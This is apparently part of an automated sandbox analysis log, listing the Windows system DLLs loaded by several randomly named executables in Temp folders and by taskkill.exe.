Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013537001\37df924488.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1013537001\37df924488.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1013537001\37df924488.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1013537001\37df924488.exe Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\1013537001\37df924488.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1013537001\37df924488.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1013537001\37df924488.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1013537001\37df924488.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1013537001\37df924488.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1013537001\37df924488.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013537001\37df924488.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1013537001\37df924488.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1013537001\37df924488.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1013537001\37df924488.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1013537001\37df924488.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013537001\37df924488.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1013537001\37df924488.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1013537001\37df924488.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1013537001\37df924488.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: mswsock.dll
